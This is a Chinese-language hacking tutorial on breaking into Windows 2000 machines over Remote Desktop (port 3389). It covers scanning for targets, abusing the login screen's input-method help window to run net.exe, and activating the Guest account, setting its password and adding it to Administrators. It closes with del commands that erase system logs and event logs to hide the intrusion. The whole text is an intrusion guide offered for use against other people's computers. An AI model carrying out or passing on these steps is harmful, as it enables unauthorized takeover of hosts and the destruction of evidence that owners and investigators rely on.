怎样破解远程端口administrator密码？

这是老漏洞了,但对于新手来说很好用,而且事实证明现在仍有很多的机子有这种漏洞 OK我们开始 : 先用扫描器扫描有3389端口开放的主机.我本人比较喜欢用流光5.0扫,我就讲解用流光扫吧 打开流光5.0,点击[探测]->扫描POP3/FTP/NT/SQL主机在弹出来的对话框中输入扫描范围,然后选择主机类型为IIS/FRONT/PAGE或者直接在这里输入端口号3389,这样就能扫出打开3389的主机,这里只能入侵WINDOWS2000. 用3389.EXE连接,或者用WINDOWSXP自带的远程登陆在运行输入mstsc,输入主机IP,点击连接,按ctrl+shift调出全拼输入法（其他似乎不行），用鼠标右键点击微软图标,如果其帮助菜单发灰，就赶快赶下家吧（人家打补丁了^_）. 点帮助，点输入法入门；在弹出的窗口中在"选项"菜单上点右键(也就是窗口的最上方的蓝条)—>跳转到URL"，输入：c:\winnt\system32,如果不能确定它的目录装在那个盘下,因为有些是装的双系统.可以命令FILL:\C:来杳看目录.好,现在跳转到了c:\winnt\system32\下,找到NET.EXE对其创建一个快捷方式,好找到快捷方式右击–>属性–>在目标C:\WINDOWS\system32\net.exe后加入 user guest /active:yes 相当于net user guest /active:yes 激活GUEST帐户,也可以建立一个新帐号,不过本人喜欢用GUEST不容易被发现. 然后点确定,再运行快捷方式,然后再打开属性在目标然后C:\WINDOWS\system32\net.exe USER GUEST 密码,相当与NET USER GUEST 密码,更改GUEST的密码,再确定,运行快捷方式,再再打开属性,在目标C:\WINDOWS\system32\net.exe LOCALGROUP ADMINISTRATORS GUEST /ADD 把GUEST加入ADMINISTRATORS组,再运行快捷方式. 退出3389连接,再重新连接,输入刚的帐号与密码,就能连接了. 最后记得灭掉自已的尾巴 删除连接文件 del+C:\winnt\system32\logfiles*.* del+C:\winnt\ssytem32\config*.evt del+C:\winnt\system32\dtclog*.* del+C:\winnt\system32*.log del+C:\winnt\system32*.txt del+C:\winnt*.txt del+C:\winnt*.log